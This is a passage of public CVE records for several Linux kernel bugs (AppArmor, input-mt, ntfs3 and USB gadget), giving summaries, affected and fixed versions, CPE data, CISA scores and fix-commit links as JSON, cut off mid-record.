__napi_poll+0x28/0x1b0\n     net_rx_action+0x2a4/0x380\n     __do_softirq+0xd1/0x2c8\n     __irq_exit_rcu+0xbb/0xf0\n     common_interrupt+0x86/0xa0\n     \u003c/IRQ\u003e\n     \u003cTASK\u003e\n     asm_common_interrupt+0x26/0x40\n    RIP: 0010:apparmor_socket_post_create+0xb/0x200\n    Code: 08 48 85 ff 75 a1 eb b1 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 41 54 \u003c55\u003e 48 89 fd 53 45 85 c0 0f 84 b2 00 00 00 48 8b 1d 80 56 3f 02 48\n    RSP: 0018:ffffa92940ce7e50 EFLAGS: 00000286\n    RAX: ffffffffbc756440 RBX: 0000000000000000 RCX: 0000000000000001\n    RDX: 0000000000000003 RSI: 0000000000000002 RDI: ffff8b574eaab740\n    RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\n    R10: ffff8b57444cec70 R11: 0000000000000000 R12: 0000000000000003\n    R13: 0000000000000002 R14: ffff8b574eaab740 R15: ffffffffbd8e4748\n     ? __pfx_apparmor_socket_post_create+0x10/0x10\n     security_socket_post_create+0x4b/0x80\n     __sock_create+0x176/0x1f0\n     __sys_socket+0x89/0x100\n     __x64_sys_socket+0x17/0x20\n     do_syscall_64+0x5d/0x90\n     ? do_syscall_64+0x6c/0x90\n     ? do_syscall_64+0x6c/0x90\n     ? do_syscall_64+0x6c/0x90\n     entry_SYSCALL_64_after_hwframe+0x72/0xdc"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:45:24.777Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0abe35bc48d4ec80424b1f4b3560c0e082cbd5c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/347dcb84a4874b5fb375092c08d8cc4069b94f81"
        },
        {
          "url": "https://git.kernel.org/stable/c/290a6b88e8c19b6636ed1acc733d1458206f7697"
        },
        {
          "url": "https://git.kernel.org/stable/c/ead2ad1d9f045f26fdce3ef1644913b3a6cd38f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/6c920754f62cefc63fccdc38a062c7c3452e2961"
        },
        {
          "url": "https://git.kernel.org/stable/c/46c17ead5b7389e22e7dc9903fd0ba865d05bda2"
        },
        {
          "url": "https://git.kernel.org/stable/c/fce09ea314505a52f2436397608fa0a5d0934fb1"
        }
      ],
      "title": "apparmor: Fix null pointer deref when receiving skb during sock creation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52889",
    "datePublished": "2024-08-17T09:08:43.973Z",
    "dateReserved": "2024-05-21T15:35:00.782Z",
    "dateUpdated": "2025-11-03T21:50:32.388Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45008 (GCVE-0-2024-45008)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2026-01-05 10:52

Title

Input: MT - limit max slots

Summary

In the Linux kernel, the following vulnerability has been resolved: Input: MT - limit max slots syzbot is reporting too large allocation at input_mt_init_slots(), for num_slots is supplied from userspace using ioctl(UI_DEV_CREATE). Since nobody knows possible max slots, this patch chose 1024.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2829c806148906244…
	https://git.kernel.org/stable/c/87f610a1a7fbdb1f2…
	https://git.kernel.org/stable/c/05dd9aabd04f9b5eb…
	https://git.kernel.org/stable/c/95f73d01f547dfc67…
	https://git.kernel.org/stable/c/94736334b8a25e4fa…
	https://git.kernel.org/stable/c/8f04edd554d191834…
	https://git.kernel.org/stable/c/cd19f1799c32ba7b8…
	https://git.kernel.org/stable/c/99d3bf5f7377d42f8…

Impacted products

Vendor

Product

Version

Linux

Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 2829c80614890624456337e47320289112785f3e (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 87f610a1a7fbdb1f2e3d90b54c955bd3b8a0c322 (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 05dd9aabd04f9b5eb04dab9bb83d8c3e982d7549 (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 95f73d01f547dfc67fda3022c51e377a0454b505 (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 94736334b8a25e4fae8daa6934e54a31f099be43 (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 8f04edd554d191834e9e1349ef030318ea6b11ba (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < cd19f1799c32ba7b874474b1b968815ce5364f73 (git)
Affected: 38e7afe96c7c0ad900824911c61fdb04078033dc , < 99d3bf5f7377d42f8be60a6b9cb60fb0be34dceb (git)

Linux

Affected: 2.6.36
Unaffected: 0 , < 2.6.36 (semver)
Unaffected: 4.19.321 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45008",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:17:57.073437Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:18:19.841Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:13.834Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/input/input-mt.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2829c80614890624456337e47320289112785f3e",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "87f610a1a7fbdb1f2e3d90b54c955bd3b8a0c322",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "05dd9aabd04f9b5eb04dab9bb83d8c3e982d7549",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "95f73d01f547dfc67fda3022c51e377a0454b505",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "94736334b8a25e4fae8daa6934e54a31f099be43",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "8f04edd554d191834e9e1349ef030318ea6b11ba",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "cd19f1799c32ba7b874474b1b968815ce5364f73",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            },
            {
              "lessThan": "99d3bf5f7377d42f8be60a6b9cb60fb0be34dceb",
              "status": "affected",
              "version": "38e7afe96c7c0ad900824911c61fdb04078033dc",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/input/input-mt.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.36"
            },
            {
              "lessThan": "2.6.36",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.321",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.321",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: MT - limit max slots\n\nsyzbot is reporting too large allocation at input_mt_init_slots(), for\nnum_slots is supplied from userspace using ioctl(UI_DEV_CREATE).\n\nSince nobody knows possible max slots, this patch chose 1024."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:47.015Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2829c80614890624456337e47320289112785f3e"
        },
        {
          "url": "https://git.kernel.org/stable/c/87f610a1a7fbdb1f2e3d90b54c955bd3b8a0c322"
        },
        {
          "url": "https://git.kernel.org/stable/c/05dd9aabd04f9b5eb04dab9bb83d8c3e982d7549"
        },
        {
          "url": "https://git.kernel.org/stable/c/95f73d01f547dfc67fda3022c51e377a0454b505"
        },
        {
          "url": "https://git.kernel.org/stable/c/94736334b8a25e4fae8daa6934e54a31f099be43"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f04edd554d191834e9e1349ef030318ea6b11ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd19f1799c32ba7b874474b1b968815ce5364f73"
        },
        {
          "url": "https://git.kernel.org/stable/c/99d3bf5f7377d42f8be60a6b9cb60fb0be34dceb"
        }
      ],
      "title": "Input: MT - limit max slots",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45008",
    "datePublished": "2024-09-04T19:54:49.763Z",
    "dateReserved": "2024-08-21T05:34:56.679Z",
    "dateUpdated": "2026-01-05T10:52:47.015Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41018 (GCVE-0-2024-41018)

Vulnerability from cvelistv5 – Published: 2024-07-29 06:37 – Updated: 2025-05-04 12:57

Title

fs/ntfs3: Add a check for attr_names and oatbl

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add a check for attr_names and oatbl Added out-of-bound checking for *ane (ATTR_NAME_ENTRY).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f3124d51e4e7b56a7…
	https://git.kernel.org/stable/c/c114d2b88f8b226d4…
	https://git.kernel.org/stable/c/9b71f820f7168f1ea…
	https://git.kernel.org/stable/c/702d4930eb06dcfda…

Impacted products

Vendor

Product

Version

Linux

Affected: e0b64e4ad2eb013fd3299e34e7fe5e19f321e140 , < f3124d51e4e7b56a732419d8dc270e807252334f (git)
Affected: 865e7a7700d930d34895a70f8af2eb4e778a5b0e , < c114d2b88f8b226d4b2acf5a1ba0412cde6c31dd (git)
Affected: 865e7a7700d930d34895a70f8af2eb4e778a5b0e , < 9b71f820f7168f1eab8378c80c7ea8a022a475bc (git)
Affected: 865e7a7700d930d34895a70f8af2eb4e778a5b0e , < 702d4930eb06dcfda85a2fa67e8a1a27bfa2a845 (git)
Affected: 653687cca0fdbf426c078b46c377c57bee49e837 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.6.43 , ≤ 6.6.* (semver)
Unaffected: 6.9.12 , ≤ 6.9.* (semver)
Unaffected: 6.10.2 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:56.071Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f3124d51e4e7b56a732419d8dc270e807252334f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c114d2b88f8b226d4b2acf5a1ba0412cde6c31dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9b71f820f7168f1eab8378c80c7ea8a022a475bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/702d4930eb06dcfda85a2fa67e8a1a27bfa2a845"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41018",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:35.520516Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:05.489Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/fslog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f3124d51e4e7b56a732419d8dc270e807252334f",
              "status": "affected",
              "version": "e0b64e4ad2eb013fd3299e34e7fe5e19f321e140",
              "versionType": "git"
            },
            {
              "lessThan": "c114d2b88f8b226d4b2acf5a1ba0412cde6c31dd",
              "status": "affected",
              "version": "865e7a7700d930d34895a70f8af2eb4e778a5b0e",
              "versionType": "git"
            },
            {
              "lessThan": "9b71f820f7168f1eab8378c80c7ea8a022a475bc",
              "status": "affected",
              "version": "865e7a7700d930d34895a70f8af2eb4e778a5b0e",
              "versionType": "git"
            },
            {
              "lessThan": "702d4930eb06dcfda85a2fa67e8a1a27bfa2a845",
              "status": "affected",
              "version": "865e7a7700d930d34895a70f8af2eb4e778a5b0e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "653687cca0fdbf426c078b46c377c57bee49e837",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/fslog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.43",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.43",
                  "versionStartIncluding": "6.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.12",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.2",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Add a check for attr_names and oatbl\n\nAdded out-of-bound checking for *ane (ATTR_NAME_ENTRY)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:25.164Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f3124d51e4e7b56a732419d8dc270e807252334f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c114d2b88f8b226d4b2acf5a1ba0412cde6c31dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/9b71f820f7168f1eab8378c80c7ea8a022a475bc"
        },
        {
          "url": "https://git.kernel.org/stable/c/702d4930eb06dcfda85a2fa67e8a1a27bfa2a845"
        }
      ],
      "title": "fs/ntfs3: Add a check for attr_names and oatbl",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41018",
    "datePublished": "2024-07-29T06:37:04.372Z",
    "dateReserved": "2024-07-12T12:17:45.612Z",
    "dateUpdated": "2025-05-04T12:57:25.164Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44960 (GCVE-0-2024-44960)

Vulnerability from cvelistv5 – Published: 2024-09-04 18:35 – Updated: 2025-11-03 22:14

Title

usb: gadget: core: Check for unset descriptor

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: core: Check for unset descriptor Make sure the descriptor has been set before looking at maxpacket. This fixes a null pointer panic in this case. This may happen if the gadget doesn't properly set up the endpoint for the current speed, or the gadget descriptors are malformed and the descriptor for the speed/endpoint are not found. No current gadget driver is known to have this problem, but this may cause a hard-to-find bug during development of new gadgets.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ba15815dd24cc5ec0…
	https://git.kernel.org/stable/c/df8e734ae5e605348…
	https://git.kernel.org/stable/c/7cc9ebcfe58be22f1…
	https://git.kernel.org/stable/c/50c5248b0ea8aae05…
	https://git.kernel.org/stable/c/a0362cd6e503278ad…
	https://git.kernel.org/stable/c/1a9df57d57452b104…
	https://git.kernel.org/stable/c/716cba46f73a92645…
	https://git.kernel.org/stable/c/973a57891608a98e8…

Impacted products

Vendor

Product

Version

Linux

Affected: d1c188d330ca33cc35d1590441ba276f31144299 , < ba15815dd24cc5ec0d23e2170dc58c7db1e03b4a (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < df8e734ae5e605348aa0ca2498aedb73e815f244 (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < 7cc9ebcfe58be22f18056ad8bc6272d120bdcb3e (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < 50c5248b0ea8aae0529fdf28dac42a41312d3b62 (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < a0362cd6e503278add954123957fd47990e8d9bf (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < 1a9df57d57452b104c46c918569143cf21d7ebf1 (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < 716cba46f73a92645cf13eded8d257ed48afc2a4 (git)
Affected: 54f83b8c8ea9b22082a496deadf90447a326954e , < 973a57891608a98e894db2887f278777f564de18 (git)
Affected: d7e3f2fe01372eb914d0e451f0e7a46cbcb98f9e (git)
Affected: 85c9ece11264499890d0e9f0dee431ac1bda981c (git)
Affected: fc71e39a6c07440e6968227f3db1988f45d7a7b7 (git)
Affected: 94f5de2eefae22c449e367c2dacafe869af73e3f (git)
Affected: 8212b44b7109bd30dbf7eb7f5ecbbc413757a7d7 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44960",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:39:50.689815Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:35.969Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:09.135Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/udc/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ba15815dd24cc5ec0d23e2170dc58c7db1e03b4a",
              "status": "affected",
              "version": "d1c188d330ca33cc35d1590441ba276f31144299",
              "versionType": "git"
            },
            {
              "lessThan": "df8e734ae5e605348aa0ca2498aedb73e815f244",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "7cc9ebcfe58be22f18056ad8bc6272d120bdcb3e",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "50c5248b0ea8aae0529fdf28dac42a41312d3b62",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "a0362cd6e503278add954123957fd47990e8d9bf",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "1a9df57d57452b104c46c918569143cf21d7ebf1",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "716cba46f73a92645cf13eded8d257ed48afc2a4",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "lessThan": "973a57891608a98e894db2887f278777f564de18",
              "status": "affected",
              "version": "54f83b8c8ea9b22082a496deadf90447a326954e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d7e3f2fe01372eb914d0e451f0e7a46cbcb98f9e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "85c9ece11264499890d0e9f0dee431ac1bda981c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "fc71e39a6c07440e6968227f3db1988f45d7a7b7",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "94f5de2eefae22c449e367c2dacafe869af73e3f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "8212b44b7109bd30dbf7eb7f5ecbbc413757a7d7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/udc/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.19.82",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.4",
